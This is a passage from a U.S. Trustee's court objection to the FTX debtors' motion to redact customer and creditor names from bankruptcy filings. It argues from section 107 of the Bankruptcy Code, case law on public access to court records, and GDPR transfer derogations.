[2]    The U.S. Trustee does not object to that portion of the Motion that seeks authority to maintain a consolidated list of creditors, or for approval of certain procedures to serve the notice of the commencement of the cases on creditors.

[3]    Any capitalized terms not defined herein shall have the definition set forth in the Motion.

3.      Disclosure is a basic premise of bankruptcy law.  Indeed, it is fundamental to the operation of the bankruptcy system and is the best means of avoiding any suggestion of impropriety that might or could be raised.  The Bankruptcy Code contains very limited and specific exceptions to the general rule that bankruptcy proceedings should be open and transparent.  The movant must demonstrate extraordinary circumstances and a compelling need to obtain protection to justify any such request.  This is especially true as to information required to be filed by the Bankruptcy Code, Bankruptcy Rules, and the Local Rules, such as the Creditor Matrix, Schedules and Statements.  Here, with nothing more than vague statements supporting the request, the Debtors seek extremely broad authority to conduct a significant portion of the bankruptcy cases under seal. If the Motion is granted, the ability of interested parties to evaluate the Debtors and their bankruptcy process and to communicate and find each other will be significantly curtailed.

4.      In addition to creating unfavorable precedent in this and other crypto industry chapter 11 cases, and in any other bankruptcy case in which a debtor has creditors who are customers, allowing the Debtors to file incomplete creditor lists and Schedules and Statements is a slippery slope.  Do the Debtors intend to conduct all of their claim objections under seal?  Will certain creditors' treatment in a plan be redacted?  Will objections to the disclosure statement and confirmation also be sealed?  Will the hearings before the Court in these cases have to be repeatedly closed?  It is well settled that, as a matter of promoting the integrity of the judicial system, bankruptcy proceedings must be open and transparent.[4]  Accordingly, the Debtors' request should be denied.

---

[4]     Although more than a month has passed since the bankruptcy filings, the Debtors have yet to file their Creditor Matrix, even though such creditor matrix is required under the Local Rules to be filed with the petition.  *See* Del. Bankr. L.R. 1007-2 (a).

5.      As to the names of those customers and other creditors who are individual

citizens of the United Kingdom or of member countries of the European Union, the Debtors

assert only cursorily that the GDPR constrains them from disclosing information regarding such

creditors, at the risk of incurring penalties.  The Motion fails to establish that a foreign statute

supplants the disclosure requirements of the Bankruptcy Code and fails to establish any

entitlement to relief.  Also not addressed in the Motion is that the GDPR contains a "safe harbor"

permitting the Debtors to disclose such information in the Debtors' exercise of their rights and

duties in these bankruptcy cases.

6.      In another cryptocurrency matter, the United States Bankruptcy Court for the

Southern District of New York recently ruled that the debtors could not redact the names of

customers and creditors who were individuals, regardless of the country of their citizenship, but

could redact their addresses and email addresses under 107(c) of the Code.  *See In re Celsius

Network, LLC*, 644 B.R. 276 (Bankr. S.D.N.Y 2022).  As to customers and creditors who were

not individuals, the court did not authorize the redaction of any information.  The U.S. Trustee

recognizes that this Court ruled differently in *In re Cred Inc., et al*. (20-12836 (JTD)).  However,

the U.S. Trustee requests that the Court reexamine these issues and limit any relief granted to

that authorized in *Celsius*.

7.      Finally, it appears the Debtors are seeking to avoid having to file unredacted

versions under seal of any documents the Court permits to be redacted in the publicly viewable

version. Instead, the Debtors propose providing unredacted copies to the Court only "upon

request."  Proposed Final Order ¶ 7.  Such proposal is contrary to the procedures for sealing set

forth in the Local Rules of this Court.  Del. Bankr. L.R. 9018-1(d).

**A0063**

8.      For these reasons, set forth in more detail below, the Debtors' Motion should be denied as it concerns redaction of information, except as to allow the redaction from public filings of the addresses and e-mail addresses – but not names – of individuals who are customers or other creditors of the Debtors, with unredacted versions of such documents directed to be filed under seal with the Court.

## II.      JURISDICTION, VENUE AND STANDING

4.      Pursuant to (i) 28 U.S.C. § 1334, (ii) applicable order(s) of the United States District Court for the District of Delaware issued pursuant to 28 U.S.C. § 157(a), and (iii) 28 U.S.C. § 157(b)(2)(A), this Court has jurisdiction to hear and determine this Objection.

5.      Under 28 U.S.C. § 586, the U.S. Trustee is charged with overseeing the administration of Chapter 11 cases filed in this judicial district.  This duty is part of the U.S. Trustee's overarching responsibility to enforce the bankruptcy laws as written by Congress and interpreted by the courts.  *See Morgenstern v. Revco D.S., Inc. (In re Revco D.S., Inc.)*, 898 F.2d 498, 500 (6th Cir. 1990) (describing the U.S. Trustee as a "watchdog").

6.      Under 11 U.S.C. § 307, the U.S. Trustee has standing to be heard on this Objection.  *See United States Trustee v. Columbia Gas Sys., Inc. (In re Columbia Gas Sys., Inc.)*, 33 F.3d 294, 295-96 (3d Cir. 1994) (noting that U.S. Trustee has "public interest standing" under 11 U.S.C. § 307, which goes beyond mere pecuniary interest).

## III.      FACTUAL BACKGROUND

**General Case Background**

7.      On November 11, 2022, the Debtors filed voluntary chapter 11 petitions in this Court.

8.      The Debtors continue to operate their business(es) as debtors in possession

5

**A0064**

pursuant to 11 U.S.C. §§ 1107 and 1108.

9.      The U.S. Trustee has solicited interest in serving on an official committee of unsecured creditors.  As of the date this Objection was filed, the U.S. Trustee had not formed any official committees.

10.     On December 1, 2022, the U.S. Trustee filed a *Motion for Entry of an Order Directing the Appointment of an Examiner*.  D.I. 176.

**The Motion and Supporting Declaration**

11.     On November 11, 2022, the Debtors filed the Motion, seeking both interim and final relief.

12.     On November 20, 2022, the Debtors filed the *Declaration of Edgar W. Mosley, II, in Support of Chapter 11 Petitions and First Day Pleadings* (the "Mosley Declaration") [D.I. 57].  In the Mosley Declaration, Mr. Mosely stated that he is a Managing Director of Alvarez & Marsal, North America LLC, a restructuring advisory services firm, which was retained by the Debtors two days prior to the bankruptcy filing to assist in the process of preparing for chapter 11 filing.  Mosely Decl. ¶¶ 1, 5.  A portion of his declaration addressed the relief sought in the Motion.  In particular, Mr. Mosley stated the following in support of that portion of the Motion that seeks to redact information in Court filings relating to customers and creditors:

> It is my view that the Debtors' estates and their customers would benefit from the redaction of certain confidential customer information. The Debtors operate a global platform catering to customers in various forms of cryptocurrency. All of the Debtors' customers are creditors. Thus, the Debtors' customer list, and related customer data, is a valuable asset to the Debtors' estate. Public dissemination of the Debtors' customer list could give the Debtors' competitors an unfair advantage to contact and poach these customers, and I believe it would interfere with the Debtors' ability to sell their assets and maximize value for their estates at the appropriate time.

> Likewise, I believe that it is in the Debtors' and their estates' best interest to redact certain personal information of individuals. It is my understanding that

6

**A0065**

the Debtors may be subject to the GDPR, which restricts disclosure of certain personal information. It is also my understanding that, notwithstanding the Court's authorization for the Debtors to redact personal information of customers and individuals, the Debtors will instruct Kroll to serve these individuals on their personal addresses or e-mail addresses, as applicable. For these reasons, the relief requested in the Creditor Matrix Motion is in the best interest of the Debtors, the creditors, and all interested parties.

*See id.* ¶¶ 18-19.[5]

13.     Mr. Mosely's declaration is the only evidence the Debtors have introduced to date in support of the Motion.  The statements quoted above are the only statements set forth in the Mosely Declaration concerning redaction of information in Court filings relating to customers and other creditors.

14.     Neither the Motion nor the Mosely Declaration indicate the number of individuals who are customers or creditors of the Debtors and who are citizens of EU member countries or the UK.  Nor do the Debtors explain how they will determine which of their customers are citizens of EU or the UK, given that the only address the Debtors may have for certain of their customers are email addresses, and even for those customers who provided mailing addresses, a mailing address does not establish citizenship.

15.     A hearing on the interim relief sought in the Motion took place at the "first day" hearing on November 22, 2022.  On November 23, 2022, the Court entered an order granting interim relief on the Motion (the "Interim Order") and set the hearing to consider approval of final relief for December 16, 2022.  D.I. 157.

16.     The Interim Order required the Debtors to file an unredacted creditor matrix under

---

[5]     It is unclear whether the statements quoted above are based on Mr. Mosley's personal knowledge, or instead are based on information Mr. Mosely "obtained from the Debtors and their advisors, including the A&M team working under [his] supervision, [his] review of relevant documents and information concerning the Debtors' operations, financial affairs, and restructuring initiatives" and his "opinions based upon [his] experience and knowledge." *See id.* ¶ 6.

seal with the Court. Interim Order ¶ 7.[6] As of the filing of this Objection, the lead case docket

does not reflect the filing of any Creditor Matrix, whether under seal or in a redacted format,

even though a creditor matrix is required by Local Rule 1007-2(a) to be filed by the debtors with

the petition.

**The Debtors' Policies for Sharing Customer Information**

17. The Debtors' Privacy Policy for the FTX Cryptocurrency Derivatives Exchange

(the "Privacy Policy"), a copy of which is attached as **Exhibit A** hereto, includes the following

regarding the disclosure of customer information to third parties:

DISCLOSING YOUR INFORMATION TO THIRD PARTIES

We may share your personal information with the following categories of third parties:

**Service Providers.** We may share any personal information we collect about you with our third-party service providers. The categories of service providers (processors) to whom we entrust personal information include: IT and related services; banks and trust companies; information and services; payment processors; customer service providers; and vendors to support the provision of the Services.

. . . .

**Business Partners.** *We may provide personal information to business partners* with whom we jointly offer products or services. In such cases, our business partner's name will appear along with ours.

. . . .

**Affiliates.** We may share personal information with our *affiliated companies*.

**Advertising Partners.** Through our Services, *we may allow third party advertising partners to set Technologies and other tracking tools to collect information regarding your activities and your device (e.g., your IP address, mobile identifiers, page(s) visited, location, time of day). We may also combine and share such information and other information (such as demographic information and past purchase history) with third party advertising partners.* These advertising partners may use this information (and similar information collected from other websites) for

---

[6]    This provision was included in the proposed interim order at the request of counsel to the U.S. Trustee.

8

purposes of delivering targeted advertisements to you when you visit third party websites within their networks. This practice is commonly referred to as "interest-based advertising" or "online behavioral advertising. ***We may allow access to other data collected by the Services to share information that may be useful, relevant, valuable or otherwise of interest to you***. ***If you prefer not to share your personal information with third party advertising partners, you may follow the instructions below.***

**Disclosures to Protect Us or Others**. ***We may access, preserve, and disclose any information we store associated with you to external parties if we, in good faith, believe doing so is required or appropriate to: comply with*** law enforcement or national security requests and ***legal process,*** such as a court order or subpoena; protect your, our or others' rights, property, or safety; enforce our policies or contracts; collect amounts owed to us; or assist with an investigation or prosecution of suspected or actual illegal activity.

**Disclosure in the Event of Merger, Sale, or Other Asset Transfers.** If we are involved in a merger, acquisition, financing due diligence, ***reorganization, bankruptcy***, receivership, purchase or sale of assets, or transition of service to another provider, then your information may be sold or transferred as part of such a transaction, as permitted by law and/or contract.

Privacy Policy at 8-9 (emphasis added).

18.     The Privacy Policy further provides: "[w]e store the personal information we receive as described in this Privacy Policy for as long as you use our Services or as necessary to fulfill the purpose(s) for which it was collected, provide our Services, resolve disputes, establish legal defenses, conduct audits, pursue legitimate business purposes, enforce our agreements, and ***comply with applicable laws***. *Id.* at 13 (emphasis added).

## IV.     LEGAL FRAMEWORK

### A.  Debtors in Bankruptcy Are Required to File Certain Information Regarding Their Creditors

19.     The Bankruptcy Code states that the debtor "*shall* . . . file, unless the court orders otherwise - a schedule of assets and liabilities," and "statement of the debtor's financial affairs, " among other information.  11 U.S.C. § 521(a)(1)(B)(i)(emphasis added).  Rule 1007-1(b) of the Federal Rules of Bankruptcy Procedure (the "Bankruptcy Rules") provides that a debtor, other

9

**A0068**

than one under chapter 9, shall file schedules of assets and liabilities, of current income an expenditures, of executory contracts and unexpired leases, and a statement of financial affairs, among other documents.

20.     Bankruptcy Rule 1007(a)(1) requires that a debtor in a voluntary case "file with the petition a list containing the name and address of each entity included or to be included on Schedules D, E/F, G and H as prescribed by the Official Forms."

21.     Rule 1007-2(a) of the Local Rules of this Court provide that "[i]n all voluntary cases, the debtor shall file with the petition a list containing the name and complete address of each creditor in such format as directed by the Clerk's Office Procedures."  Del. Bankr. L.R. 1007-2(a) (emphasis added).

22.     Debtors in chapter 11 and chapter 9 cases are also required to file Official Form 201, setting forth a list of creditors with the largest unsecured claims that are not insiders. That form requires the provision of the following information for such creditors:  name, complete mailing address, the name, telephone number and email address of a creditor contact, and the nature and amount of claim.

**B.  <u>The Right of Public Access to Judicial Records</u>**

23.     In American jurisprudence, there is a long-standing, common law right of public access to court records.  *See Nixon v. Warner Commc'ns Inc.*, 435 U.S. 589, 591 (1978) ([i]t is clear that the courts of this country recognize a general right to inspect and copy public records and documents, including judicial records and documents.")  The public's right of access envisions "a pervasive common law right to inspect and copy public records and documents, including judicial records and documents."  *In re Cendant Corp.*, 260 F.3d 183, 194 (3rd Cir. 2001) (citations omitted).

24.     The "access to civil proceedings and records promotes public respect for the judicial process." *Id.* (citations omitted).  Such access is "rooted in the public's First Amendment right to know about the administration of justice."  *Motors Liquidation Co. Avoidance Action Trust v. JP Morgan Chase Bank, N.A. (In re Motors Liquidation Co.)*, 561 B.R. 36, 41 (Bankr S.D.N.Y. 2016).  This right is "firmly entrenched and well supported by policy and practical considerations."  *Orion Pictures Corp. v. Video Software Dealers Assoc.*, 21 F.3d 24, 26 (2d Cir. 1994).

25.     The right of public access has given rise to "a strong presumption and public policy in favor of public access to court records."  *In re Borders Grp., Inc.*, 462 B.R. 42, 46 (Bankr. S.D.N.Y. 2011).  This presumption "is based on the need for federal courts . . . to have a measure of accountability and for the public to have confidence in the administration of justice . . . . [P]ublic monitoring is an essential feature of democratic control."  *United States v. Amodeo*, 71 F.3d 1044, 1048 (2d Cir. 1995).  The Second Circuit has issued this pointed guidance:

> There must be a strong presumption against sealing any document that is filed with the court.  Our courts do not operate in secrecy.  Except on rare occasions and for compelling reasons, everything that courts do is subject to public scrutiny.  To hide from the public entire proceedings, or even particular documents or testimony forming a basis for judicial action that may directly and significantly affect public interests, would be contrary to the premises underling a free, democratic society.

*City of Hartford v. Chase*, 942 F.2d 130, 137 (2d Cir. 1991).

## C.  The Right to Public Access Is Codified in the Bankruptcy Code

26.     In our bankruptcy system, it is widely acknowledged that the governmental interest is safeguarding public access to judicial records is "of special importance . . . , as unrestricted access to judicial records fosters confidence among creditors regarding fairness in the bankruptcy system."  *Motors Liquidation*, 561 B.R. at 41, *quoting Gitto v. Worcester*

11

**A0070**

*Telegram & Gazette Corp. (In re Gitto Global Corp.)*, 422 F.3d. 1, 7 (1st Cir. 2005) (*quoting In re Crawford*, 194 F.3d. 954, 960 (9th Cir. 1999). Described as "fundamental to the operation of the bankruptcy system and . . . the best means of avoiding any suggestion of impropriety that might or could be raised," the policy of open inspection, as applied in this Court, cannot be underestimated. *Motors Liquidation*, 561 B.R. at 41-42, *quoting In re Bell & Beckwith*, 44 B.R. 661, 664 (Bankr. N.D. Ohio 1984).

27.     The common law right of public access to judicial records has been codified in section 107(a) of the Bankruptcy Code. *Togut v. Deutsche Bank AG (In re Anthracite Capital Inc.)*, 492 B.R. 162, 170, 173 (Bankr S.D.N.Y. 2013); *see also Gitto Global*, 422 F.3d at 7-8 (section 107 supplants the common law of public access). Pursuant to § 107(a), papers filed in bankruptcy cases and the Court's dockets are "public records, open to examination by an entity at reasonable times without charge."  11 U.S.C. § 107(a); *Anthracite*, 492 B.R. at 170.

**D.  The Limited Exception of Bankruptcy Code § 107(c)**

28.     Despite its deep underpinnings, the right to public access to court records is "not absolute." *Nixon*, 435 U.S. at 598; *Motors Liquidation*, 561 B.R. at 42. "Every court has supervisory power over its own records and files, and access has been denied where court files might have become a vehicle for improper purposes." *Nixon*, 435 U.S. at 598; *Orion Pictures*, 21 F.3d at 27 (noting that court may limit access where user's purpose is improper).

29.     Section 107(b)(1) of the Code provides that, "[o]n request of a party in interest, the bankruptcy court shall, . . .  protect an entity with respect to a trade secret or confidential research, development or commercial information." 11 U.S.C. § 107(b)(1). Section 107(b) of the Code provides a "narrow statutory exception" to public access in bankruptcy cases." *In re Muma Services, Inc.*, 279 B.R. 478, 484 (Bankr. D. Del. 2002).

12

**A0071**

30.  Section 107(c)(1), added to the Code through the Bankruptcy Abuse Prevention and Consumer Protection Act of 2005, "broadened the situations in which the court could protect individuals from disclosure of sensitive information in light of the emerging problem of identity theft." 2 *Collier on Bankruptcy* ¶ 107.LH[2] (16th ed.). The statute provides:

> (c)(1) The bankruptcy court, for cause, may protect an individual, with respect to the following types of information to the extent the court finds that disclosure of such information would create undue risk of identity theft or other unlawful injury to the individual or the individual's property:

> (A) Any means of identification (as defined in section 1028(d) of title 18) contained in a paper filed, or to be filed, in a case under this title.

> (B) Other information contained in a paper described in subparagraph (A).

11 U.S.C. § 107(c)(emphasis added).

31.  Section 1028(d)(7) of title 18 ("Fraud and related activity in connection with identification documents, authentication features, and information") defines "means of identification" as "any name or number that may be used, alone or in conjunction with any other information, to identify a specific individual," including any –

> (A)  name, social security number, date of birth, official State or government issued driver's license or identification number, alien registration number, government passport number, employer or taxpayer identification number;

> (B)  unique biometric data (such as finger print, voice print retina or iris image, or other unique physical representation);

> (C)  unique electronic identification number, address, or routing code; or

> (D)  telecommunication identifying information or access device (as defined in section 1029(e)).

18 U.S.C. § 1028(d)(7).

32.  The specific "purpose of § 107(c) is to set forth a limited exception to the general rule that all records are public." *In re French*, 401 B.R. 295, 305 (Bankr. E.D. Tenn. 2009). Accordingly, under the precise structure and deliberate terms of § 107(c), the Court, in the

13

**A0072**

exercise of its discretion, *may* limit public access of certain identification information only if it determines that (1) *cause exists, and* (2) *to the extent* dissemination of the information would constitute an *undue risk* of identity theft. *Id.* (emphasis added). The Supreme Court has "emphasized that the word 'may' clearly connotes discretion." *Halo Elecs., Inc. v. Pulse Elecs., Inc.*, 579 U.S. 93, 136 S. Ct. 1923, 1931 (2016). "Undue," which appears as a modifier in section 107(c), is not defined in the Bankruptcy Code, and generally means "excessive or unwarranted." *Black's Law Dictionary* (3rd pocket ed. 2006). With regard to the statutory interpretation of modifiers, such as "undue," the Court has the "duty to 'give effect, if possible, to every clause and word of [the] statute.'" *In re Mazzeo*, 131 F.3d 295, 302 (2d Cir. 1997) (interpreting "liquidated" and "noncontingent" as modifiers of "debts" in § 109(e)), *quoting United States v. Menasche*, 348 U.S. 528, 538-39 (1955).

33. Given the express limitations in the statute permitting a bankruptcy court to "protect an individual" solely "to the extent" that "undue" risk is present, § 107(c)(1), like § 107 in general, "does not mandate sealing – only protection." *Motions Seeking Access to 2019 Statements*, 585 B.R. 733, 753 (D. Del. 2018), *quoting Anthracite*, 492 B.R. at 180. It follows from this principle that the Court's consideration of a request for relief under § 107(c)(1) necessarily entails a consideration of competing interests. *Id.*, 585 B.R. at 755-57.

**E. The Debtors Have the Burden of Proof Under § 107(b)(1) and (c)(1)**

34. In seeking to apply any exception to the general right of public access to judicial records, codified by section 107(a) of the Bankruptcy Code, "[t]he burden is on the party who seeks to overcome the presumption of access to show that the interest in secrecy outweighs the presumption." *Cendant Corp.*, 260 F.3d at 194. In *Cendant*, the Third Circuit Court of Appeals further explained:

14

**A0073**

> [T]he party seeking the closure of a hearing or the sealing of part of the judicial record "bears the burden of showing that the material is the kind of information that courts will protect" and that "disclosure will work a *clearly defined and serious injury to the party seeking closure*." In delineating the injury to be prevented, *specificity is essential.* Broad allegations of harm, bereft of specific examples or articulated reasoning, are insufficient.

*Id.* (internal citations omitted, emphasis added).

35.     The moving party bears the burden of showing that a request to place documents under seal falls within the parameters of Bankruptcy Code § 107(b) and Bankruptcy Rule 9018 by demonstrating ". . . that the interest in secrecy outweighs the presumption in favor of access." *United States v. Continental Airlines, Inc.. (In re Continental Airlines, Inc.),* 150 B.R. 334, 340 (D.Del. 1993); *accord Food Mgmt. Group,* 359 B.R. at 561 (Bankr. S.D.N.Y. 2007); *In re Fibermark, Inc.*, 330 B.R. 480 (Bankr. D. Vt. 2005).

36.     The burden of proof to seal or redact filed bankruptcy papers "is not an easy burden nor should it be. . . . The party seeking impoundment must submit 'evidence the filing under seal outweighs the presumption of public access to court records.'" *In re Creighton*, 490 B.R. 240, 244 (Bankr. N.D. Ohio 2013), *quoting Gitto/Global*, 321 B.R. at 373, *quoting In re Muma Servs. Inc.*, 279 B.R. 478, 485 (Bankr. D. Del. 2002). "[S]ealing official documents," as the Debtors would like, "should not be done without a compelling reason." *City of Hartford*, 942 F.2d at 135.

## F.     <u>The General Data Protection Regulation</u>

37.     The EU's privacy law, known as the GDPR, became effective as of May 25, 2018, and establishes standards for entities that collect or process data on citizens and residents of EU member countries.[7] At the unified EU level, the GDPR is administered by the European

---

[7]     A copy of the GDPR can be accessed at https://eur-lex.europa.eu/legal-content/EN/TXT/?uri=celex:32016R0679R(02) or https://gdpr.eu/tag/gdpr/.

Commission ("EU Commission"), which is responsible for proposing EU-wide legislation, implementing decisions of EU member states, upholding EU treaties, and managing the EU's daily affairs. Also, the European Data Protection Board, which includes representatives from data protection authorities of each EU member state, has promulgated guidelines for compliance with the GDPR. *See* www.edpb.europa.eu.

38. With respect to individuals who are citizens of the UK, all data processing and collection of data prior to December 31, 2020 falls under EU's GDPR, because the UK was a member of the EU through that date. Data collected after that date falls under the UK's GDPR, which can be accessed at https://uk-gdpr.org/.[8] The UK's GDPR is substantially similar to that of the EU GDPR. Unless otherwise indicated, the Article numbers of the GDPR cited herein are the same Article numbers for both the EU and UK GDPR.

39. An entity's obligations under the GDPR are determined by reference to whether the entity is a "controller" of information -- or merely a "processor" -- under the GDPR. Generally, a data processor is an entity that merely processes (*e.g.*, collects, stores or uses) personal data on behalf or at the direction of a data controller. GDPR Art. 4(8). A data controller is an entity that determines the purposes for which the personal data is processed, and how the data is processed. GDPR Art. 4(7) (an entity that "determines the purposes and means of processing personal data"). The Debtors in these U.S. bankruptcy cases qualify as "data controllers" under the GDPR.

40. The GDPR protects the disclosure of "personal data," which includes "any information relating to an identified or identifiable natural person ('data subject')." GDPR Art. 4(1). An "identifiable natural person" under the GDPR "is one who can be identified, directly or

---

[8]    *See* https://www.gdpreu.org/differences-between-the-uk-and-eu-gdpr-regulations/.

A0075

indirectly, in particular by reference to an identifier such as a name, an identification number, location data" and other attributes. *Id*.

41.     Transactions involving the personal data of EU or UK citizens and residents who are located within the EU or UK, or who are doing business with entities also based in the EU or UK, are covered by the GDPR.  GDPR Art. 3.  The GDPR also has extra-territorial reach.  In addition to EU and UK based entities, the GDPR also applies to the processing by non-EU and non-UK entities "of personal data of [individual] "data subjects who are in the [European] Union," or the UK, regardless of citizenship, where the entity's processing generally concerns its business or its monitoring of the data subjects' EU or UK based behavior.  GDPR Art. 3(1, 2). U.S. entities, for example, may be subject to the GDPR if they control or process data concerning EU or UK citizens and residents.  *Id*.

42.     In the event that data controllers (e.g., the Debtors) collect personal data from an individual "data subject" (e.g., a creditor of the Debtors), they must provide certain processing information to the individual data subject, including contact information for the controller, the purpose of the data collection, any intended recipients of the data, and whether the personal data will be transferred outside the EU or UK.  GDPR Art. 13(1).  Processing personal data under the GDPR is lawful if the data subject consents, if processing is necessary for contractual performance, or if processing is "necessary for compliance with a legal obligation to which the controller is subject," among others.  GDPR Art. 6(1).

43.     Within the particular territory of a given EU member, an independent public authority, known under the EU GDPR as a "Supervisory Authority," and a "Commissioner" under the UK GDPR, is responsible for monitoring compliance with the GDPR, enforcing the GDPR's edicts, and conducting investigations.  The GDPR imposes a tiered structure of

17

**A0076**

corrective actions and administrative fines for violations of the GDPR, which are imposed by the applicable Supervisory Authority or UK Commissioner. A Supervisory Authority or UK Commissioner may, for example, issue warnings for likely processing infringements of the GDPR, issue reprimands for actual infringements, or suspend data flows to recipients in third countries. GDPR Art. 58(2).

44.      Also, "depending on the circumstances of each individual case" a Supervisory Authority or UK Commissioner may impose administrative (*i.e.*, monetary) fines for infringements of the GDPR. GDPR Art. 83(1). As an exercise of discretion, "[w]hen deciding whether to impose an administrative fine and deciding on the amount of the administrative fine in each individual case, due regard" must be given by the Supervisory Authority or UK Commissioner to "the nature, gravity and duration of the infringement[,] taking into account the nature[,] scope or purpose of the processing concerned," among other aggravating or mitigating factors. GDPR Art. 83(2). A Supervisory Authority may impose an administrative fine of up to €10.0 million, and the UK Commissioner up to 8.7 million pounds, or two percent of an offending entity's global annual revenue for lesser processing infringements, and a fine of up to €20.0 million, and the UK Commissioner up to 17.5 million pounds, or four percent of global annual revenue for other GDPR infringements, including the unauthorized transfer of personal data to third countries (*i.e.*, countries outside the EU or the UK). GDPR Art. 83(4, 5).

45.      Pursuant to the GDPR, transfers of "personal data which are undergoing processing or are intended for processing after transfer to a third country" may "take place only if, subject to the other provisions of [the] Regulation," (*i.e.*, whether a GDPR-recognized legal basis applies to the processing of the data as a threshold matter), the data controller complies with certain "conditions" set forth in Chapter V of the GDPR. GDPR Art. 44. The Debtors'

18

**A0077**

filings in these U.S. bankruptcy cases of documents containing Personal Information qualify under the GDPR as transfers of personal data to a third country.

46.     Generally, under GDPR Chapter 5, data processors such as the Debtors may transfer personal data to third countries such as the U.S. if they have met one of three conditions: (1) the EU Commission or a UK Commissioner has made a prior "adequacy decision" vis-à-vis the recipient third country; (2) the data processor has put in place one of several "appropriate safeguards;" or (3) if a specific "derogation" (*i.e.*, an exception) set forth in the GDPR applies. GDPR Arts. 45, 46, 49.  In these bankruptcy cases, it appears that solely the third condition – *i.e.*, the derogations in the GDPR – apply to the data transfers proposed by the Debtors in the Motion to Redact.[9]

47.     If a European or UK entity's transfer of personal data to a third country such as the U.S. is not covered by either a prior adequacy decision or an appropriate safeguard recognized under the GDPR, the data transfer may still be made under the GDPR if it is covered

---

[9]     The GDPR contains two antecedent conditions not applicable here.  First, under the GDPR, transfers of personal data to third countries also may first take place if covered by a prior "adequacy decision" of the EU Commission.  GDPR, Art. 45(1, 3).  Such a decision constitutes a finding by the EU Commission that the legal framework in place for the recipient third country provides an "adequate level of protection" for the personal data rights of EU individuals.  *Id*.  Because the EU Commission has made only a partial finding of adequacy with respect to the U.S., EU entities may transfer personal data to U.S. entities under GDPR Art. 45(1) only if covered by the Commission-approved EU-US Privacy Shield framework.  *See* www.privacyshield.gov.  To the extent that the Federal government and the Court are recipients of personal data of EU residents, they are neither eligible for nor signatories to the Privacy Shield.

Second, in the absence of an adequacy decision pursuant to GDPR Art. 45(3), a data controller also may transfer personal data to a third country only if the controller has provided one of certain enumerated "appropriate safeguards."  GDPR Art. 46 (1, 2).  Such safeguards generally consist, among others, of:  instruments between public authorities involved in the transfers; binding inter-corporate rules approved by a Supervisory Authority; contracts with a third country recipient containing Supervisory Authority- or Commission-approved data protection clauses; a recipient's participation in a Supervisory Authority-approved code of conduct; or a recipient's certification by a Supervisory Authority.  GDPR Art. 46.

by one of the exceptions provided in GDPR Article 49 ("Derogations for specific situations"). Known in the GDPR as "derogations," the exceptions include: the explicit consent of the individual data subject (*e.g.*, an employee) (GDPR Art. 49(1)(a)); the transfer is necessary for the performance of a contract between the individual and the data controller (GDPR Art. 49(1)(b)); or "***the transfer is necessary for the establishment, exercise or defence of legal claims***" ("Legal Claim Exception," GDPR Art. 49(1)(e) (emphasis added)).

### IV.     OBJECTION

48.     The Debtors have not overcome the long-standing presumption of the public's right to access court records. It is well settled that honesty and full disclosure are paramount in bankruptcy. The duty of disclosure is important in the chapter 11 context, where the debtor in possession serves as a trustee for the bankruptcy estate. *In re Scott*, 172 F.3d 959, 967 n.6 (7th Cir. 1999). In these cases, the Debtors have not overcome that presumption.

**A. The Debtors Have Not Established Grounds to Redact Customer Names Under Section 107(b) of the Bankruptcy Code**

49.     The Debtors seek to redact the names, addresses and other contact information for all of their customer-creditors, whether they be individuals, corporations of other legal entities, from "any paper filed or to be field with the Court or made publicly available in these Chapter 11 Cases," which includes, but is not limited to, the Debtors "Creditor Matrix, Consolidated Top 50 Creditor List and Schedules and Statements" as well as all affidavits of service, the Claims Register and proofs of claim. Mot. ¶ 12; Proposed Final Order ¶ ¶ 4, 5. The Debtors argue that such names effectively constitute a customer list, which is entitled to protection as confidential commercial information under section 107(b) of the Code and which, if disclosed, could allow competitors to poach those customers and interfere with the debtors' ability to sell their assets. Mot. ¶¶ 12, 13.

50.     Under section 107(b), "commercial information" has been defined as information which would cause an "unfair advantage to competitors by providing them information as to the commercial operations" of the requesting party. *In re Orion Pictures Corp.*, 21 F.3d 24, 27 (2d Cir. 1994) (internal quotations omitted); *accord In re Borders Group, Inc.,* 462 B.R. 42, 47 (Bankr. S.D.N.Y., 2011).

51.     "The 'commercial information' exception is not intended to offer a safe harbor for those who crave privacy or secrecy for its own sake." *Motors Liquidation Co.,* 561 B.R. at 43 (*quoting In re Dreier LLP*, 485 B.R. 821, 822-23 (Bankr. S.D.N.Y. 2013)). "Evidence–not just argument–is required to support the extraordinary remedy of sealing." *Id.* at 43; *accord Dreier*, 485 B.R. at 823 (finding that "conclusory statements in [a declaration] are not probative").

52.     To meet its burden to show that a request to place documents under seal falls within the parameters of Section 107(b), a movant "must demonstrate *extraordinary circumstances and compelling need* to obtain protection." *Food Mgmt.*, 359 B.R. at 561 (emphasis added)(*citing In re Orion Pictures Corp*., 21 F.3d 24, 27 (2d Cir. 1994)).  In addition, "[t]he moving party bears the burden of demonstrating that the information it is seeking to protect from public viewing is both commercial and confidential." *In re Williams*, No. 15-71767, 2017 WL 6278764, at *3 (Bankr. W.D. Va. Dec. 8, 2017) (citing *In re Oldco M Corp.*, 466 B.R. 234, 237 (Bankr. S.D. N.Y. 2012) and *In re Northwest Airlines Corp.*, 363 B.R. 704, 706 (Bankr. S.D. N.Y. 2007)).

53.     The Debtors have not demonstrated extraordinary circumstances or compelling need to seal the names of those customer and other creditors who are individuals, or the names and addresses of those customer-creditors who are not individuals. Nor do the Debtors cite any authority holding that the type of information they seek to seal is both confidential and

21

**A0080**

commercial information under the Bankruptcy Code. *See, e.g., In re Motors Liquidation Company,* 561 B.R. 36, 44 (Bankr. S.D.N.Y., 2016) (holding that the identities of the owners of 10% or more of the equity interests of a party in an adversary proceeding are not confidential commercial information and denying motion to seal). The Debtors provide only conclusory statements regarding the information's commercial importance, and "statements made by lawyers in briefs are not evidence." *Id.* "To put it clearly, just because information may be 'confidential' does not mean it is 'commercial information' entitled to the extraordinary procedure of sealing." *Id.*

54.     The information the Debtors seek to conceal here falls directly into the category of information that is required to be disclosed when a party avails itself of the protections of the Bankruptcy Code. *See* 11 U.S.C. § 521; Fed. R. Bankr. P. 1007; Del. Bankr. L.R. 1007-1(a) and 1007-2(a). The Debtors, who have voluntarily sought relief in this Court, have no basis for sealing the Creditor Matrix, Schedules, Statements, or the list of the largest unsecured creditors. Congress was clear that bankruptcy proceedings must be transparent, and transparency requires pleadings to be filed on the public docket unless narrow and enumerated exceptions apply.  Such exceptions do not apply here.

55.     The purpose of requiring a debtor to disclose all assets, liabilities and business dealings is to ensure that creditors have reliable and accurate information which they can rely on to determine the status of the debtor's financial affairs and to trace a debtor's financial history. *In re Haynes*, 549 B.R. 677, 687 (Bankr. D. S.C. 2016). The bankruptcy schedules and statements of affairs are designed to elicit certain information necessary to the proper administration and adjudication of the case. *Id.*

22

A0081

